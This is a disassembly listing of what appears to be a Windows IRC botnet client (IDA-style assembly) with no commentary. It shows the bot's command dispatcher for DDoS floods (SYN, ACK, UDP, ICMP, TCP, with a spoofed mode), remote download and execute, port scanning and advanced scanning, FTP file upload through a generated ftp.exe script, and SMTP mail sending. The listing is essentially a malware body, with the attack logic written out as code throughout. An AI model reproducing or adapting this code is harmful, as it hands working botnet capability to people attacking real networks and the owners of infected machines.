; ---------------------------------------------------------------------------
loc_411114: ; CODE XREF: sub_40EE72+2020�j
push [ebp+arg_8]
push offset aCom_capture ; "com.capture"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413400
push [ebp+arg_8]
push offset aCom_cap ; "com.cap"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413400
push [ebp+arg_8]
push offset aIrc_gethost ; "irc.gethost"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413312
push [ebp+arg_8]
push offset aIrc_gh ; "irc.gh"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413312
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40F239
push [ebp+arg_8]
push offset aIrc_addalias ; "irc.addalias"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4132E0
push [ebp+arg_8]
push offset aIrc_aa ; "irc.aa"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4132E0
push [ebp+arg_8]
push offset aIrc_privmsg ; "irc.privmsg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41328A
push [ebp+arg_8]
push offset aIrc_pm ; "irc.pm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41328A
push [ebp+arg_8]
push offset aIrc_action ; "irc.action"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413224
push [ebp+arg_8]
push offset aIrc_ac ; "irc.ac"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413224
push [ebp+arg_8]
push offset aIrc_cycle ; "irc.cycle"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4131BB
push [ebp+arg_8]
push offset aIrc_cy ; "irc.cy"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4131BB
push [ebp+arg_8]
push offset aIrc_mode ; "irc.mode"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413181
push [ebp+arg_8]
push offset aIrc_m ; "irc.m"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413181
push [ebp+arg_8]
push offset aClone_raw ; "clone.raw"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413113
push [ebp+arg_8]
push offset aClone_ra ; "clone.ra"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413113
push [ebp+arg_8]
push offset aClone_mode ; "clone.mode"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41308E
push [ebp+arg_8]
push offset aClone_m ; "clone.m"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41308E
push [ebp+arg_8]
push offset aClone_nick ; "clone.nick"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413022
push [ebp+arg_8]
push offset aClone_ni ; "clone.ni"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413022
push [ebp+arg_8]
push offset aClone_join ; "clone.join"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412FFC
push [ebp+arg_8]
push offset aClone_j ; "clone.j"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412FFC
push [ebp+arg_8]
push offset aClone_part ; "clone.part"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412F99
push [ebp+arg_8]
push offset aClone_p ; "clone.p"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412F99
push [ebp+arg_8]
push offset aIrc_repeat ; "irc.repeat"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412ED0
push [ebp+arg_8]
push offset aIrc_rp ; "irc.rp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412ED0
push [ebp+arg_8]
push offset aIrc_delay ; "irc.delay"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E33
push [ebp+arg_8]
push offset aIrc_de ; "irc.de"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E33
push [ebp+arg_8]
push offset aDownload_updat ; "download.update"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412CAF
push [ebp+arg_8]
push offset aDownload_up ; "download.up"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412CAF
push [ebp+arg_8]
push offset aCom_execute ; "com.execute"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412C1C
push [ebp+arg_8]
push offset aCom_e ; "com.e"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412C1C
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412B1B
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412B1B
push [ebp+arg_8]
push offset aCom_rename ; "com.rename"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412AC9
push [ebp+arg_8]
push offset aCom_mv ; "com.mv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412AC9
push [ebp+arg_8]
push offset aDdos_icmp ; "ddos.icmp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4129C8
push [ebp+arg_8]
push offset aDdos_ic ; "ddos.ic"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4129C8
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40F239
push [ebp+arg_8]
push offset aClone_make ; "clone.make"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4128DD
push [ebp+arg_8]
push offset aClone_start ; "clone.start"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4128DD
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_synflood ; "ddos.synflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4126DA
push [ebp+arg_8]
push offset aDdos_synf ; "ddos.synf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4126DA
push [ebp+arg_8]
push offset aDownload_wget ; "download.wget"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412599
push [ebp+arg_8]
push offset aDownload_wg ; "download.wg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412599
push [ebp+arg_8]
push offset aDaemon_redirec ; "daemon.redirect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41249C
push [ebp+arg_8]
push offset aDaemon_rd ; "daemon.rd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41249C
push [ebp+arg_8]
push offset aRoot_portscan ; "root.portscan"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4123A9
push [ebp+arg_8]
push offset aRoot_ps ; "root.ps"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4123A9
push [ebp+arg_8]
push offset aClone_privmsg ; "clone.privmsg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4122D4
push [ebp+arg_8]
push offset aClone_pm ; "clone.pm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4122D4
push [ebp+arg_8]
push offset aClone_action ; "clone.action"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4121BC
push [ebp+arg_8]
push offset aClone_ac ; "clone.ac"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4121BC
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40F239
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411E65
push [ebp+arg_8]
push offset aAdv ; "adv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411E65
push [ebp+arg_8]
push offset aDdos_udpflood ; "ddos.udpflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aDdos_udpf ; "ddos.udpf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aU_0 ; "u"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aDdos_pingflood ; "ddos.pingflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aDdos_pingf ; "ddos.pingf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aP ; "p"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aDdos_tcpflood ; "ddos.tcpflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A65
push [ebp+arg_8]
push offset aDdos_tcpf ; "ddos.tcpf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A65
push [ebp+arg_8]
push offset aUtil_email ; "util.email"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_41189C
lea eax, [ebp+var_3F8]
push edi
push eax
call sub_4179C0
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_DB0]
push eax
call sub_4179C0
push [ebp+arg_10]
lea eax, [ebp+var_BA8]
push eax
call sub_4179C0
push offset asc_42A3B4 ; " "
push offset a__1 ; "_"
push [ebp+esi+var_80]
call sub_40A7D7
push eax
lea eax, [ebp+var_55C]
push eax
call sub_4179C0
add esp, 30h
lea eax, [ebp+var_6EC]
push eax
push 101h
call ds:dword_43AD10 ;; WSAStartup
lea eax, [ebp+var_3F8]
push eax
call ds:dword_43AE1C ;; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_43AE18 ;; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_2EC], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2E8], eax
call ds:dword_43AD98 ;; htons
mov [ebp+var_2EA], ax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_BA8]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_15B0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_4172B0
add esp, 1Ch
lea eax, [ebp+var_2EC]
push 10h
push eax
push esi
call ds:dword_43AD40 ;; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_43ADB0 ;; recv
lea eax, [ebp+var_CAC]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_15B0]
push eax
push esi
call ds:dword_43ADE8 ;; send
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_43ADB0 ;; recv
push esi
call ds:dword_43AE30 ;; closesocket
call ds:dword_43ACF8 ;; WSACleanup
lea eax, [ebp+var_BA8]
push eax
push offset unk_431AA4
loc_411888: ; CODE XREF: sub_40EE72+3B51�j
; sub_40EE72+3E38�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
jmp loc_413A62
; ---------------------------------------------------------------------------
loc_41189C: ; CODE XREF: sub_40EE72+28C0�j
push [ebp+arg_8]
push offset aUtil_httpcon ; "util.httpcon"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A34
push [ebp+arg_8]
push offset aUtil_hcon ; "util.hcon"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A34
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40F239
push [ebp+arg_8]
push offset aFtp_upload ; "ftp.upload"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F47
push 4
push esi
call sub_40D000
pop ecx
test eax, eax
pop ecx
jnz short loc_411906
push esi
push offset dword_431A4C
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_411906: ; CODE XREF: sub_40EE72+2A87�j
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
pop ecx
call sub_41730C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41730C
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41730C
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_CB0]
push edx
push eax
lea eax, [ebp+var_BAC]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_4172B0
lea eax, [ebp+var_BAC]
push offset aAb ; "ab"
push eax
call sub_4179A8
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40F239
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_417956
push [ebp+arg_24]
call sub_417900
add esp, 20h
lea eax, [ebp+var_BAC]
push eax
lea eax, [ebp+var_3F8]
push offset aSS_4 ; "-s:%s"
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_3F8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call ds:dword_43AD0C
test eax, eax
push edi
push esi
jz short loc_4119D3
push offset dword_4319D4
jmp short loc_4119D8
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_40EE72+2B58�j
push offset dword_431998
loc_4119D8: ; CODE XREF: sub_40EE72+2B5F�j
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_411A01
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_411A01: ; CODE XREF: sub_40EE72+2B71�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
loc_411A0D: ; CODE XREF: sub_40EE72+2BC0�j
lea eax, [ebp+var_BAC]
push 4
push eax
call sub_40D000
add esp, 0Ch
test eax, eax
jz loc_40F239
lea eax, [ebp+var_BAC]
push eax
call sub_419BBA
jmp short loc_411A0D
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_40EE72+2A3B�j
; sub_40EE72+2A52�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_41781F
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_406AF8
loc_411A5D: ; CODE XREF: sub_40EE72+587A�j
add esp, 24h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_411A65: ; CODE XREF: sub_40EE72+2892�j
; sub_40EE72+28A9�j
mov esi, 80h
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41782A
lea eax, [ebp+var_678]
push eax
push offset aSyn ; "syn"
call sub_4176D0
add esp, 14h
test eax, eax
jz short loc_411AC8
lea eax, [ebp+var_678]
push eax
push offset aAck ; "ack"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411AC8
lea eax, [ebp+var_678]
push eax
push offset aRandom ; "random"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411AC8
push offset dword_431960
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_411AC8: ; CODE XREF: sub_40EE72+2C1C�j
; sub_40EE72+2C33�j ...
push [ebp+arg_10]
call sub_41781F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_411BF4
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_6F8]
push [ebp+arg_18]
push esi
push eax
call sub_41782A
push [ebp+arg_0]
call sub_41781F
mov [ebp+var_574], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_56C], ebx
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_411B65
mov eax, offset aNormal ; "Normal"
loc_411B65: ; CODE XREF: sub_40EE72+2CEC�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset dword_43190C
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 0Ch
push eax
call sub_416D5C
add esp, 2Ch
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_401D82
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_411BE3
loc_411BCD: ; CODE XREF: sub_40EE72+2D6F�j
cmp [ebp+var_560], ebx
jnz loc_41460C
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_411BCD
; ---------------------------------------------------------------------------
loc_411BE3: ; CODE XREF: sub_40EE72+2D59�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4318C4
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_411BF4: ; CODE XREF: sub_40EE72+2C67�j
push offset dword_43187C
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_411BFE: ; CODE XREF: sub_40EE72+284D�j
; sub_40EE72+2864�j ...
cmp ds:dword_43AE88, ebx
mov esi, [ebp+arg_4]
jnz loc_411D09
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41781F
push 7Fh
mov [ebp+var_310], eax
push [ebp+var_8C]
lea eax, [ebp+var_418]
push eax
call sub_418C10
add esp, 24h
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset unk_431824
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 0Eh
push eax
call sub_416D5C
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40AF86
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_411CF8
loc_411CE6: ; CODE XREF: sub_40EE72+2E84�j
cmp [ebp+var_2FC], ebx
jnz short loc_411D22
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_411CE6
; ---------------------------------------------------------------------------
loc_411CF8: ; CODE XREF: sub_40EE72+2E72�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4317DC
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_411D09: ; CODE XREF: sub_40EE72+2D95�j
push 1FFh
lea eax, [ebp+var_2DC]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_418C10
loc_411D1F: ; CODE XREF: sub_40EE72+3A66�j
add esp, 0Ch
loc_411D22: ; CODE XREF: sub_40EE72+2E7A�j
; sub_40EE72+2FD2�j ...
cmp [ebp+var_8], ebx
jnz loc_414E11
push ebx
push [ebp+var_4]
loc_411D2F: ; CODE XREF: sub_40EE72+567E�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push esi
jmp loc_414629
; ---------------------------------------------------------------------------
loc_411D42: ; CODE XREF: sub_40EE72+2808�j
; sub_40EE72+281F�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41781F
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_310], eax
jz short loc_411DA7
push esi
call sub_41781F
pop ecx
mov [ebp+var_30C], eax
jmp short loc_411DAD
; ---------------------------------------------------------------------------
loc_411DA7: ; CODE XREF: sub_40EE72+2F24�j
mov [ebp+var_30C], ebx
loc_411DAD: ; CODE XREF: sub_40EE72+2F33�j
push 7Fh
lea eax, [ebp+var_418]
push [ebp+var_8C]
push eax
call sub_418C10
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset dword_43176C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 0Fh
push eax
call sub_416D5C
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B112
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_411E54
loc_411E3E: ; CODE XREF: sub_40EE72+2FE0�j
cmp [ebp+var_2FC], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_411E3E
; ---------------------------------------------------------------------------
loc_411E54: ; CODE XREF: sub_40EE72+2FCA�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_431724
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_411E65: ; CODE XREF: sub_40EE72+27DA�j
; sub_40EE72+27F1�j
push 8
call sub_416FA4
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_41781F
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 3E8h
jle short loc_411EB8
push [ebp+arg_8]
lea eax, [ebp+var_2DC]
push offset unk_4316D8
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_411EB8: ; CODE XREF: sub_40EE72+300F�j
push edi
call sub_41781F
push [ebp+arg_18]
mov [ebp+var_330], eax
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
add esp, 0Ch
cmp eax, 2
mov [ebp+var_32C], eax
jnb short loc_411EF1
push 2
pop eax
mov [ebp+var_32C], eax
loc_411EF1: ; CODE XREF: sub_40EE72+3074�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_411EFE
mov [ebp+var_32C], ecx
loc_411EFE: ; CODE XREF: sub_40EE72+3084�j
push [ebp+arg_10]
call sub_41781F
cmp eax, 270Fh
pop ecx
mov [ebp+var_328], eax
jbe short loc_411F1E
mov [ebp+var_328], 270Fh
loc_411F1E: ; CODE XREF: sub_40EE72+30A0�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_42ACB0, ebx
mov [ebp+arg_0], ebx
jz short loc_411F74
mov [ebp+arg_24], offset dword_42ACB0
loc_411F37: ; CODE XREF: sub_40EE72+30E4�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411F5A
add [ebp+arg_24], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_411F37
jmp short loc_411F74
; ---------------------------------------------------------------------------
loc_411F5A: ; CODE XREF: sub_40EE72+30D6�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_42ACB0[ecx]
mov [ebp+var_330], ecx
loc_411F74: ; CODE XREF: sub_40EE72+30BC�j
; sub_40EE72+30E6�j
cmp [ebp+var_330], ebx
jz loc_414039
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_411FBB
cmp byte ptr [edi], 23h
jz short loc_411FBB
push edi
lea eax, [ebp+var_444]
push 10h
push eax
call sub_41782A
push 78h
push edi
call sub_418F50
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_304], eax
jmp loc_41208F
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_40EE72+3117�j
; sub_40EE72+311C�j
cmp [ebp+var_9C7], bl
jnz short loc_411FDD
cmp [ebp+var_9C6], bl
jnz short loc_411FDD
cmp [ebp+var_9B6], bl
jnz short loc_411FDD
push offset unk_431694
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_411FDD: ; CODE XREF: sub_40EE72+314F�j
; sub_40EE72+3157�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call ds:dword_43AD3C ;; getsockname
mov al, [ebp+var_9C7]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_418C10
add esp, 0Ch
cmp [ebp+var_9B6], bl
jz short loc_412089
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_418F10
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_41207D
loc_41205B: ; CODE XREF: sub_40EE72+3209�j
cmp eax, ebx
jz short loc_41207D
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_418F10
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_41205B
loc_41207D: ; CODE XREF: sub_40EE72+31E7�j
; sub_40EE72+31EB�j
mov [ebp+var_304], 1
jmp short loc_41208F
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_40EE72+31C1�j
mov [ebp+var_304], ebx
loc_41208F: ; CODE XREF: sub_40EE72+3144�j
; sub_40EE72+3215�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_334], eax
mov eax, [ebp+var_4]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov edi, 80h
lea eax, [ebp+var_434]
push edi
push eax
call sub_41782A
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_4120E0
loc_4120CD: ; CODE XREF: sub_40EE72+3291�j
push esi
loc_4120CE: ; CODE XREF: sub_40EE72+327B�j
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_41210B
; ---------------------------------------------------------------------------
loc_4120E0: ; CODE XREF: sub_40EE72+3259�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4120EF
cmp byte ptr [eax], 23h
jnz short loc_4120EF
push eax
jmp short loc_4120CE
; ---------------------------------------------------------------------------
loc_4120EF: ; CODE XREF: sub_40EE72+3273�j
; sub_40EE72+3278�j
mov esi, offset aF ; "#f"
push offset byte_436EDC
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4120CD
mov [ebp+var_3B4], bl
loc_41210B: ; CODE XREF: sub_40EE72+326C�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_41211D
mov eax, offset aSequential ; "Sequential"
loc_41211D: ; CODE XREF: sub_40EE72+32A4�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_431610
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5C
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40797F
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4121AB
loc_412195: ; CODE XREF: sub_40EE72+3337�j
cmp [ebp+var_300], ebx
jnz loc_41460C
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412195
; ---------------------------------------------------------------------------
loc_4121AB: ; CODE XREF: sub_40EE72+3321�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4315C8
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_4121BC: ; CODE XREF: sub_40EE72+279A�j
; sub_40EE72+27B1�j
push edi
call sub_41781F
imul eax, 234h
pop ecx
cmp ds:byte_440808[eax], bl
jz loc_414F47
cmp [ebp+var_C], ebx
jz loc_414F47
push [ebp+arg_18]
call sub_417AB0
push edi
mov esi, eax
call sub_417AB0
